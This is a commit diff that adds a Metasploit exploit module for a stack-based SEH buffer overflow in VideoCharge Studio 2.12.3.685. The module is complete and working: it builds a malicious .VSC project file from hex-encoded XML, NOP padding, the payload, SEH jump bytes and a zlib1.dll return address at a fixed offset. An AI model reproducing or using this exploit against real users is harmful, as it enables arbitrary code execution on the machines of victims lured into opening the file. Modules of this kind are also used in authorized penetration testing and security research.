Added VideoCharge Studio File Format Exploit
parent
67f661823a
commit
28ad0fccbd
|
@ -0,0 +1,92 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'VideoCharge Studio 2.12.3.685 Buffer Overflow (SEH)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when
|
||||
processing a specially crafted .VSC file. This vulnerability could be
|
||||
exploited by a remote attacker to execute arbitrary code on the target
|
||||
machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'metacom', # Original discovery
|
||||
'Andrew Smith', # MSF Module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '69616' ],
|
||||
[ 'CVE', '' ],
|
||||
[ 'EBD', '29234' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => 'process',
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
|
||||
'DisableNops' => true,
|
||||
},
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'VideoCharge Studio 2.12.3.685',
|
||||
{
|
||||
'Ret' => 0x61B811F1, #p/p/r | zlib1.dll
|
||||
'Offset' => 824
|
||||
}
|
||||
],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Oct 27 2013',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.vsc']),], self.class)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
buffer = "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22"
|
||||
buffer << "\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x57\x69\x6E\x64\x6F\x77\x73\x2D\x31\x32"
|
||||
buffer << "\x35\x32\x22\x20\x3F\x3E\x3C\x63\x6F\x6E\x66\x69\x67\x20\x76\x65\x72\x3D\x22\x32\x2E"
|
||||
buffer << "\x31\x32\x2E\x33\x2E\x36\x38\x35\x22\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D"
|
||||
buffer << "\x65\x3D\x22\x46\x69\x6C\x65\x73\x22\x2F\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61"
|
||||
buffer << "\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x73\x22\x3E\x0A\x0A\x3C\x50\x72\x6F\x70"
|
||||
buffer << "\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x22\x3E\x0A"
|
||||
buffer << "\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x46\x6F\x72\x6D\x61\x74\x73\x22"
|
||||
buffer << "\x3E\x0A\x0A\x3C\x50\x72\x6F\x70\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x53\x74"
|
||||
buffer << "\x72\x65\x61\x6D\x22\x3E\x0A\x0A\x3C\x56\x61\x6C\x75\x65\x20\x6E\x61\x6D\x65\x3D\x22"
|
||||
buffer << "\x4E\x61\x6D\x65\x22\x20\x74\x79\x70\x65\x3D\x22\x38\x22\x20\x76\x61\x6C\x75\x65\x3D\x22"
|
||||
buffer << make_nops(target['Offset']-payload.encoded.length)
|
||||
buffer << payload.encoded
|
||||
buffer << "\xeb\x06\x90\x90" #nseh negative jump
|
||||
buffer << [target.ret].pack("V")
|
||||
buffer << "\xe9\x3f\xfd\xff\xff" #long jump
|
||||
buffer << "\x22\x2F\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F"
|
||||
buffer << "\x63\x6F\x6C\x73\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x52\x6F"
|
||||
buffer << "\x6D\x61\x6E\x69\x61\x20\x53\x65\x63\x75\x72\x69\x74\x79\x20\x54\x65\x61\x6D\x22\x2F"
|
||||
buffer << "\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6C"
|
||||
buffer << "\x73\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6E\x66\x69\x67\x3E"
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(buffer)
|
||||
|
||||
end
|
||||
end
|
||||
|
Loading…
Reference in New Issue